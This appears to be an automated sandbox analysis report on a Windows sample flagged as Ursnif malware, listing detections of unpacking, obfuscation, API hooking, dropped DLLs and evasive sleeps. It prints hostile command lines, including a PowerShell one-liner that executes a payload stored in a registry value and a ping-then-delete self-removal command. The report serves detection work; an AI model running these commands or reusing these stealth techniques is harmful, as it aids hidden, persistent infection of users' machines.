Source: Binary string: C:\gapajoxo-luhibomihi za.pdb source: FpYf5EGDO9.exe
Source: Binary string: ntdll.pdb source: FpYf5EGDO9.exe, 00000000.00000003.458681957.0000000005D50000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: FpYf5EGDO9.exe, 00000000.00000003.458681957.0000000005D50000.00000004.00000001.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\i1aaekli.pdb source: powershell.exe, 0000000E.00000002.590639322.000001A9845B8000.00000004.00000001.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\i1aaekli.pdbXP source: powershell.exe, 0000000E.00000002.590858233.000001A9845FD000.00000004.00000001.sdmp

Data Obfuscation:

barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Unpacked PE file: 0.2.FpYf5EGDO9.exe.400000.0.unpack
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Unpacked PE file: 0.2.FpYf5EGDO9.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_03C4E9AC push 0B565A71h; ret 0_2_03C4E9B1
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_03C4AFAF push ecx; ret 0_2_03C4AFBF
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_03C4AC00 push ecx; ret 0_2_03C4AC09
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_03C4E62F push edi; retf 0_2_03C4E630
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_0042EA80 push ecx; mov dword ptr [esp], 00000000h 0_2_0042EA81
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_021C5A54 push ds; ret 0_2_021C5A55
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_021BF050 push ebx; retf 0_2_021BF062
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_021BED5D push edx; iretd 0_2_021BED94
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_021C3D79 push 12BFE4EFh; ret 0_2_021C3D7E
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_021BFF72 push esp; iretd 0_2_021BFF83
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_021BE769 push esi; iretd 0_2_021BE76A
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_021C2BBF push es; iretd 0_2_021C2BC2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_0374FECD push ecx; mov dword ptr [esp], 00000002h 44_2_0374FECE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_03752D7B push ecx; ret 44_2_03752D8B
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_00401264 LoadLibraryA,GetProcAddress, 0_2_00401264
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i1aaekli.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4v5gswf4.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i1aaekli.cmdline Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4v5gswf4.cmdline Jump to behavior
Source: initial sample Static PE information: section name: .text entropy: 7.04723316599

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\i1aaekli.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\4v5gswf4.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000002.698116221.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696063794.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.397698170.00000000046FC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696408888.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696253842.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.539264556.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.540966391.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.397157084.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351549542.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351505235.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.542615243.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.531429519.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696348362.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696117374.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.463832492.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351619714.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696320291.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696213478.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.396094392.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351527418.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351580737.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696160386.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351432716.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351478648.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: FpYf5EGDO9.exe PID: 5556, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 2904, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6080, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4544, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 6088, type: MEMORYSTR
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.43394a0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.48794a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FpYf5EGDO9.exe.3c40000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.43394a0.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.48a4ef8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001F.00000000.537482070.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.646320070.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.536149519.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.614869233.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.638980317.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.461568150.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.658606689.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.511067245.0000000004500000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.564696264.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.592498182.000001A99050B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.642623861.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.557126032.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.508974340.0000000004339000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.569957507.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.462780080.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.534786772.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.660520120.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.397014247.00000000047FA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.397054517.0000000004879000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.601911502.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.656936601.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.459559350.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.608382094.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Self deletion via cmd delete
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\FpYf5EGDO9.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\FpYf5EGDO9.exe
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFC8BAF521C
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFC8BAF5200
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Uses ping.exe to sleep
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2296 Thread sleep time: -6456360425798339s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5548 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4162 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\i1aaekli.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\4v5gswf4.dll Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000019.00000000.495767986.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
